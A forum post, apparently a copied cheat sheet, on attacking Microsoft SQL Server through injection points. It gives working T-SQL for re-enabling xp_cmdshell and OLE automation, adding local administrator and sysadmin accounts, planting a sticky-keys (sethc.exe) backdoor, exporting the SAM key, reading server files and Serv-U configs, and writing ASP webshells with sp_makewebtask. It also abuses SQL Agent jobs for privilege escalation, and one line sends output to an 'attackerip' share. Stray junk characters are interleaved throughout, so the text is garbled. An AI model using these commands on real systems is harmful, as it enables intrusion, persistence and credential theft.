1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
3 U% G8 S' X9 ?恢复方法:查询分离器连接后,
2 X" |0 T- V5 K/ T; I第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& S9 e* B0 p4 q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 9 Q# j& e5 r+ G& p
然后按F5键命令执行完毕, J: D* f- Q0 f8 L5 m/ P
7 v6 P9 `% l) Y0 v7 I% f5 T- ~! p
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ N3 _$ U3 J3 n4 ]* z0 A9 ~* }% O
恢复方法:查询分离器连接后,. ~5 D2 w/ e% V# N' m
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"( ^ {9 H( _3 R" f
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( r: _' }( W* F" v' x! v" d
然后按F5键命令执行完毕
7 y c! {8 z! H) x
8 p0 R, n- f% x" j, I5 ^* t3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
6 @) K" O2 B$ s恢复方法:查询分离器连接后,. G" N7 @# [& p! I
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'; C& p J2 L; |. j* u. e7 a
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ! j% d1 Q) V: ?% b4 Q
然后按F5键命令执行完毕
" d) x6 w$ A2 Y8 M$ S! q* g9 I' W" K% F5 f: G% Z
4 终极方法.7 o2 N7 _' |' w# X+ R! B
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
8 H4 A9 {) Y# X' L. C1 l查询分离器连接后,
; N" ^2 P' n+ k9 U' o2 u( A& y2000servser系统:
/ y Q% L/ H& U# x; M. b; Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add': k1 _3 V/ A6 @% m" [
- x: t3 G7 S' F$ b9 G) x: x* }) `, i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add': n! _0 w8 U* ~# P& Y
6 p/ t" z! A4 T( P1 B; s7 o
xp或2003server系统:7 d: o5 V/ i: }# ?5 W) X& \
0 z( k- X- a7 I6 Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
' K% A: f) Q% Q- _* {7 I
* s! r5 ?, \0 T( l2 e2 H2 t3 Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
0 U+ o" l& P4 [- S& b. ^
, n! J' U6 l& S/ Z y+ W
7 ^; O; V0 M2 [$ Q a五个SHIFT; D& F5 G: v+ v( t/ d( N* T
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';* ^- o. ]( {& V. O/ N7 g& K1 N
' U0 _/ j4 `7 [: R2 K$ g& e1 h
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
9 f* d5 y7 Y9 c
* j' m. v( A9 t$ A( r' }1 p3 c2 rxp_cmdshell执行命令另一种方法( [" T# Y5 `8 i V c, f7 ?" w7 j
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' - b: k4 P, @# R% |1 T& ]4 I% d
8 X: D& `+ p4 ^2 B- o0 @" R* d# Y. x3 E, O
判断存储扩展是否存在+ y1 E8 C* n. O1 n1 c, s C% s
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
- X, ~& A7 s1 `0 @# K- S7 I返回结果为1就OK7 S% P1 } p( C2 j7 u: D0 X
7 C& y* F- t3 @. o5 P
3 g7 `$ K" k6 K, B2 X) k4 D( _6 ?上传xplog70.dll恢复xp_cmdshell语句:
j( {6 ~/ D! _! v; ~( v6 X2 s" Q4 Usp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
! e! X% j8 Z9 m# Z% I$ @! } x v: w3 }% ]# r
否则上传xplog7.0.dll
+ r8 P; s Z g) i+ LExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll' J! x$ K5 I. F/ z
5 t N! M2 A& @+ e- h5 k) i. j4 y8 Y1 N/ b$ @! i% l; F# {; J/ c6 e# h- j
b9 `+ A1 V5 p) u1 z. v首先开启沙盘模式:
) O6 A3 U0 [& ?$ S& Cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
4 m4 f! t, G' }' f3 ^" p' ~1 |* {$ j+ r
然后利用jet.oledb执行系统命令6 m$ I- R* c: Q( U3 O9 Z
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')4 C" q8 I% d/ [
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了+ I4 i& p8 K* R+ Z8 U
( f1 I# j# w+ p# {# y: I9 r* m8 D3 @0 w
2 Y5 v6 S4 I( ]0 @+ J; B
恢复过程sp_addextendedproc 如下:
, Z6 u2 I9 V, g; w) \- @( ?create procedure sp_addextendedproc --- 1996/08/30 20:13 ! |& y" Z v* Z
@functname nvarchar(517),/* (owner.)name of function to call */
+ e! k: c; G/ w7 c@dllname varchar(255)/* name of DLL containing function */ " \: \" ]) t) r4 K! Y- l/ A C- S5 F
as {7 \: C: q2 E6 y# m; D5 r! |9 P( q! r
set implicit_transactions off 9 u" x* U8 Y; ?9 k+ b$ Y( ?
if @@trancount > 0
U8 q% V( i, f1 k0 r$ Obegin
) I, [* e ]% @, f% \raiserror(15002,-1,-1,'sp_addextendedproc') ; {( P7 O8 D% b, [1 }% T
return (1)
" s. r/ P" E+ W1 K6 z6 ]; Wend . `5 x" `3 j) R+ i* ]( I
dbcc addextendedproc( @functname, @dllname) 7 ~6 @5 X' j$ z8 W" l9 b7 _
return (0) -- sp_addextendedproc
' q7 a0 h# q! a8 hGO Z- X5 f7 W: \- D9 g' E- E
! M6 K! q" `8 S3 ~$ V
$ m" a9 ]! ?( x2 G- E
1 T% y; a! |: }8 p' R+ G6 L1 q4 ^
导出管理员密码文件; c' A6 _. a* r+ u8 P8 y9 q/ F" L1 H
sa默认可以读sam键.应该。
. u1 p3 a3 A8 Z$ u1 I# L& K0 J8 b' mreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
' q# x2 E+ w: t; i0 nnet user administrator test9 M5 J3 u- A2 Z( |: Q+ H
用administrator登陆.4 Y+ ~( C1 t8 \8 ^9 M, n8 {( ~! W
用完机器后
/ U- G) \# b' k* Q z, @. mreg import c:\test.reg
/ e0 {; I8 q) r$ N, X* C$ s3 A根本不用克隆.
2 C) O9 _; z6 K# s# ^3 L9 _找到对应的sid. # F$ b8 F4 J, Y$ z) R+ j+ _. O. j) U' o
: s& g0 I4 K# |, \
; ^8 d* k+ u/ ~ n6 T% h9 z! {
恢复所有存储过程/ b% L% Y4 t* A
use master
# P# i9 _+ l8 r Yexec sp_addextendedproc xp_enumgroups,'xplog70.dll'
% g7 u0 u% { S; x$ p6 m5 Vexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' % R) i$ c: {1 z) O4 m) u
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 9 j+ V( l; W/ ~
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
+ r$ E' y; ~, Eexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
& Y- V- [+ {3 @9 E- O2 zexec sp_addextendedproc sp_OACreate,'odsole70.dll' 5 B- |) f7 J/ x& c; \
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' 6 S( O2 b& U0 w/ [
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 8 M+ W3 a) x! U/ x6 D Q. a; Q
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
2 P) \! y$ U2 g, Mexec sp_addextendedproc sp_OAMethod,'odsole70.dll' 7 \/ p Z; U6 i* N- j+ e Y
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
& W. O' E1 Q5 S5 O# w: ^9 X1 ?9 Yexec sp_addextendedproc sp_OAStop,'odsole70.dll'
+ q+ b) ~; d% x# T3 Q8 bexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' , |+ L* S- y a+ E7 ?' i; g- {
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 2 h1 h# N6 a8 Q' m5 P( E
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
8 `9 }- }2 q! n2 g, k- H# r; jexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' + j( m7 g7 z6 G2 _0 }+ q
exec sp_addextendedproc xp_regread,'xpstar.dll' 0 H9 v" U! R, l+ o5 g' C
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' " m% d4 s0 S3 |6 j
exec sp_addextendedproc xp_regwrite,'xpstar.dll' % U$ f# q; W7 F
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'$ q5 s* G* y$ R4 P
% n. y( m) n. C! E: S
5 w- g5 s1 f6 |建立读文件的存储过程
) t! N/ M* Q) y" v' G" u: GCreate proc sp_readTextFile @filename sysname' i/ s4 T( L, \* e; R1 x* G7 e
as
& ~9 ~- F( Z, c: ^' ^5 j; F3 d/ A
begin
E* S& ]! u. W& }3 s& t4 t set nocount on # p* a8 L% v# F& X
Create table #tempfile (line varchar(8000)), }1 R/ U6 r- s# y0 L2 D
exec ('bulk insert #tempfile from "' + @filename + '"')
' I+ n: `1 w! j, S4 ]8 c6 h6 k3 I) C) e select * from #tempfile
6 N7 Y9 M% ~ U2 O @ drop table #tempfile
v+ B- q; j- _( d2 F: g* o! Z9 U( bEnd
7 k( {# v0 \. d7 O6 h- A# i; e( I/ }6 L( C' r* d8 f% P
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
2 T3 b. Q5 Z2 S$ ~# x7 q( D5 k/ J0 r查看登录用户
5 }; r. i* x* E* fSelect * from sysxlogins
* o. r7 y+ |9 B$ R2 a4 c, ^. N, u p* ?$ M
把文件内容读取到表中
9 i9 O; U$ Q& r! IBULK INSERT tmp from "c:\test.txt"
& m: }7 T8 D; k6 [( h$ P% WdElete from 表名 清理表里的内容
/ A$ B2 C8 V4 xcreate table b_test(fn nvarchar(4000));建一个表,字段为fn
1 z0 m$ S' j$ J1 C# }' Q
7 K0 Q/ r' J$ r- c) K9 v
; N, I& |: q# Z加sa用户+ e5 d* c: H! H6 i
exec master.dbo.sp_addlogin user,pass;+ h3 n. R+ }3 t8 s$ D& e* N& `
exec master.dbo.sp_addsrvrolemember user,sysadmin8 h7 Y/ W" E5 {. m
. n7 K3 [* Q0 a9 n/ r
# Q9 S* E7 k |1 r) j b2 t5 m( w& l* U( F
读文件代码3 h8 ~' C% L- `" {& Q0 }" O
declare @o int, @f int, @t int, @ret int
& X7 P* j7 I/ r+ e9 ^2 {declare @line varchar(8000): v! `* p, O5 k' k: m
exec sp_oacreate 'scripting.filesystemobject', @o out. {& c6 K) w9 M' K
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
2 q' ]! Q" O. r) V% Oexec @ret = sp_oamethod @f, 'readline', @line out7 D$ S# V _( B! r. D5 o1 L' p
while( @ret = 0 )2 p& T0 ~$ w8 X* ~, X
begin$ R$ K" E' C/ @6 U( S: H
print @line
1 V' N3 }6 v8 h5 P8 d+ R3 N. @exec @ret = sp_oamethod @f, 'readline', @line out
5 T7 L" V$ }+ _/ t- Q3 Pend
5 y7 q" Z, N/ e6 l, `$ p1 f7 o' p2 n1 l* x
1 I4 D( U( i1 f# L
写文件代码:6 c( X' T* p. w+ D' t' I
declare @o int, @f int, @t int, @ret int/ M0 v: A& F I9 m% P
exec sp_oacreate 'scripting.filesystemobject', @o out. v7 ~ K6 ^! J% u8 _6 N
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
' _( K% a7 m* Z8 b0 m% e$ Q: Uexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
; j/ A! H7 C: r% K( }2 j0 f2 i) F! L8 C; R) r+ u
: W- U* B, H+ u
添加lake2 shell
4 [/ f4 }" a5 q7 S$ ~! W' s+ K, Wsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'2 ~3 c l& ]6 T7 o7 |, G$ e+ N
sp_dropextendedproc xp_lake2
/ [. `% @3 D* f% o" I) k. DEXEC xp_lake2 'net user'
2 o& s( v1 O& W+ z# `$ Z# j2 F( h
. P' x6 W! a$ C; g4 Z得到硬盘文件信息
7 w0 P9 [, F' T6 V0 D9 R--参数说明:目录名,目录深度,是否显示文件
9 }+ V: q6 c2 w s: lexecute master..xp_dirtree 'c:' # L3 b5 H9 {& X# Y7 A
execute master..xp_dirtree 'c:',1
6 }! C* m0 G9 `) y: g* Jexecute master..xp_dirtree 'c:',1,1 ' S2 i! I! q9 l" P
* M1 s: e/ F( h, |/ Y% B8 `
( K, o/ z3 O% X j3 R2 X读serv-u配置信息
3 X. T0 p+ _4 g5 d; bexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
9 }9 `" V) @7 q" n) ?exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
m) n& U2 o' Q" b! s7 {* p$ Z7 b2 S# g, h! F# C; c
通过xp_regwrite写SHIFT后门
( u- ] n. R3 }' r4 a6 [exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--- A9 }2 N. ?. ~4 [: o& y) X4 `
' L, \! g t3 d, D! d; [' z
2 K: S4 I9 J: c5 A5 x8 k4 K/ X3 { ~/ f ]5 j u% X
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
" ?% [/ T% I1 |exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
5 A7 i" g4 f; l5 E
1 z R; C! Q' V; XEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'& z* ~) ^# j7 d* A' b7 E, ]
; v2 N" ~, a+ u# n% I2 Z5 R% E5 V2 u9 q! t; w' Q0 c. c
y" l0 `, z' e8 d- P! C
sql server 2005下开启xp_cmdshell的办法0 j0 ~! d; J5 u5 k0 i
; x% ~! f: }$ N0 AEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;* ?1 M- ~3 s9 o* N* y( Q
+ L" ]- T) \6 c# \
SQL2005开启'OPENROWSET'支持的方法:* h% O5 D( _: W ]
; a$ p" t8 t6 |
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
. A4 l2 J0 o# w% Q( k4 E. n7 v) m( }4 z$ G5 _; i0 l/ d6 H6 i- w! p
SQL2005开启'sp_oacreate'支持的方法:7 g6 |& I2 M# I! b) T
& `! r A" _2 Q Qexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
/ i& y5 t. t2 J) A$ J# V j
' h$ T, w6 K& E( X2 c6 u$ n0 {) q0 s! G+ m* `
. }; v2 _! r3 t9 i9 r4 L* G' E6 n0 ]- Z; t! z, v& E& w! }
% Q; t- J* p) [9 n* Q+ r! i; l! ?- ]3 T$ Z; S
w. X$ q. @4 v
' `" ^( Y4 N7 e6 S8 s
: l9 C' {# u& P* m% w7 N
; b3 X; C& J# h7 C7 ~% d
+ V; Z/ N. u6 J! J) S4 h, y% U$ Y6 Q5 Z0 ?
2 |! s ]9 m) \# ~6 f- ~' ?" a- N2 {; E) w7 q& K/ x
% Y8 T- z5 M7 ^+ n& D% J6 [) R2 J
# I" c! q8 D1 M+ d# ^; M4 a
$ U9 c" Q: }% [2 ?+ F
" ?( T- Q$ y) {3 V+ U/ P. R$ I- H7 r: B; u
# h7 T* {, i0 ^3 C# [0 I
7 o$ G! q, d. k5 a: o* y( ~
% o( z: Z; S, C& i* s9 }
; _' A$ K- w" M以下方面不知道能不能成功暂且留下研究哈:* ^+ E1 v4 m3 B5 a+ u- l' c
4), |& b, s5 t+ C: Z- _1 W4 A
use msdb; --这儿不要是master哟2 J# C, G+ `6 U& n( f2 L
exec sp_add_job @job_name= czy82 ;
9 V4 f4 B7 r0 F0 Q, g- Sexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;, t# h6 Q- {' |+ B8 r/ b# w
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ; i1 D' ^( Q r4 l
exec sp_start_job @job_name= czy82 ;
% D1 E9 {9 e2 U& v. s# j
$ s' W% O+ E3 |" W; s5 I利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
& W# d6 S& {. G) i执行tsql语句了.
& s3 K% `/ B, J# g- @1 G对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
8 B( z+ q" ?1 X: C! |- p第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)9 Z6 T* b p. o, P' F+ G- [4 [
net start SQLSERVERAGENT: O; [4 v+ n; o# Y5 ]+ G
: N7 Y. t8 e3 ]" S3 L7 z对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
( }! I* H0 w0 g5 _2 u6 SUSE msdb
' ?4 U" @; b: h3 NEXEC sp_add_job @job_name = GetSystemOnSQL ,
7 d" ^5 N# K% C$ H) d* {@enabled = 1,
/ y5 {! y9 j$ X- U* w( D: X@description = This will give a low privileged user access to) Y$ a) c2 o. F' T. b& j
xp_cmdshell ,
: M8 x3 p; I7 ]8 r' v@delete_level = 1" l# l r/ ~( v
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
Q& ~9 m1 M& z' M% w& y. T@step_name = Exec my sql ,) l$ e. |, F. N' n) k: g3 |2 D
@subsystem = TSQL ,' f: ]3 P- ^# [/ F0 a) G+ ~
@command = exec master..xp_execresultset N select exec
9 V G/ X0 y( \' u6 d* n9 |' G. J+ rmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
' ]! \4 _$ e, G9 ~8 X; [+ eEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
5 k& M" \$ ~/ C" l@server_name = 你的SQL的服务器名 2 \# ?7 L5 Q3 p4 O
EXEC sp_start_job @job_name = GetSystemOnSQL ( |# i+ J6 k5 G k( i, t" H( q$ N& P
6 ?/ Q6 r: V( v# p9 ^不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以% ^2 E9 i8 G A3 ?" ?
才让我们可以以public执行xp_cmdshell) J+ N8 p4 c5 @
6 a+ [% Q$ F2 E9 o
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以), P3 \$ p7 A W4 P- \
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968, H* ~( r7 c6 g/ J
) D6 }2 J" s. G9 y# yUSE msdb
' B1 x P4 g/ a3 mEXEC sp_add_job @job_name = ArbitraryFilecreate ,7 W6 ^' g5 J2 X8 w- d5 A
@enabled = 1,
$ q/ b% k! E0 Y3 E@description = This will create a file called c:\sqlafc123.txt , o; K/ |6 Y8 k
@delete_level = 1
9 g! [6 G% U+ K7 A5 ^: [* Y8 iEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
# G% ]) @8 ` K& H. P@step_name = SQLAFC ,3 C: c, q4 I0 ?
@subsystem = TSQL ,
; O5 Q$ X4 E2 J$ N3 K@command = select hello, this file was created by the SQL Agent. ,! q. l7 d; ~9 Z) H( G P; d
@output_file_name = c:\sqlafc123.txt
7 f* h, h2 F( @6 y k0 qEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
& g; V6 Y' q, r@server_name = SERVER_NAME # Q$ s. p! D; Y4 g: X8 `
EXEC sp_start_job @job_name = ArbitraryFilecreate # {( n# ]5 Y0 W0 J
0 {' N }' o* X! j) |6 O6 u* j如果subsystem选的是:tsql,在生成的文件的头部有如下内容
/ T. Y* h# f: p" G
! Y: I: L: U) y/ l! t8 Q3 R??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
6 H& n' G/ B$ I. r----------------------------------------------
, E/ {, I% i0 ]: f. ~ p* Qhello, this file was created by the SQL Agent., f( G( U( |8 B3 x" z9 ]5 `3 q
3 U) E1 g& \) |5 q$ c( c9 ?6 u
(1 ?????)$ m1 t7 t- E+ a& }+ O
( g2 _. S' j4 o8 t( q
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
, g- g, w2 v0 G命令的vbs文件到启动目录!1 C4 @" P8 \1 \ ?& P# H
- {% G+ ?7 _; K7 S3 s7 o6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
: u9 }; u1 j- N, x X关于sp_MScopyscriptfile 看下面的例子
" z$ h( A$ k! |0 @/ ddeclare @command varchar(100)
. y/ j& |. ~# wdeclare @scripfile varchar(200) 5 L, X0 b0 O( y+ X* I
set concat_null_yields_null off , P6 e$ i" f( t) H7 V
select @command= dir c:\ > "\\attackerip\share\dir.txt"
4 V1 }- d- L. \) G$ x+ D; f4 tselect @scripfile= c:\autoexec.bat > nul" | @command | rd " + @9 [9 S8 ?3 s# O, B; q+ Q/ X
exec sp_MScopyscriptfile @scripfile , : Y) ]5 @' _8 X( \4 v1 T1 Q
) b x, T" J8 v& m, H& c5 G这两个东东都还在测试试哟
. S" M( J5 g/ L: N让MSSQL的public用户得到一个本机的web shell - Y, L8 _# {: o# o; ^, }( n
/ F' S- k; m/ a! E# H4 Zsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
- p- j3 i" N6 P( b; c0 ?--@query= select <img src=vbscript:msgbox(now())>
& @7 j! ?7 s4 j/ x--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
4 q( f! V0 |& _! }! C+ q" c@query= select
! T/ i$ A, a" @; {& X! s6 g<%On Error Resume Next
/ U0 h" R( c G0 c. }! bSet oscript = Server.createObject("wscript.SHELL")
2 @7 W/ w* }+ {6 sSet oscriptNet = Server.createObject("wscript.NETWORK") 8 z& d- J* J" @) n
Set oFileSys = Server.createObject("scripting.FileSystemObject")
* A# m3 g1 ^( a' T1 v! ~szCMD = Request.Form(".CMD") & \; j, A' k( G9 T8 y
If (szCMD <>"")Then
2 z. }% z$ Z# t) H; a- N0 G9 c2 HszTempFile = "C:\" & oFileSys.GetTempName() ; c/ `5 v! T9 h: W Z0 Q$ f+ a# i: E
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) " o9 ^2 A7 R7 c7 L0 k Y
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
" _1 I4 c5 V0 zEnd If %> 6 T" f5 `: O5 X. j2 I' }# C
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
5 O; L: O; K9 ]7 o& N9 d<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
" _# }. Z( c# v, Z- g( }3 f</FORM><RE> 5 Q$ i5 Q5 L5 D) c R
<% If (IsObject(oFile))Then % s; Y. d9 @1 x% b0 n$ Q, A* j
On Error Resume Next 9 U( d; v( @2 }1 @( f% f4 U
Response.Write Server.HTMLEncode(oFile.ReadAll) 4 @- h# p9 a6 d0 {
oFile.Close
# j6 J: P1 Q$ d3 c" J D; o9 Q: uCall oFileSys.deleteFile(szTempFile, True) 1 S& ` d6 c; G6 ~8 {: H4 ^
End If%> 2 A; [8 R! S% j) c f
</BODY></HTML> . l' b9 {, E- U
|
发表于 2012-9-15 14:37:30
收藏
支持
反对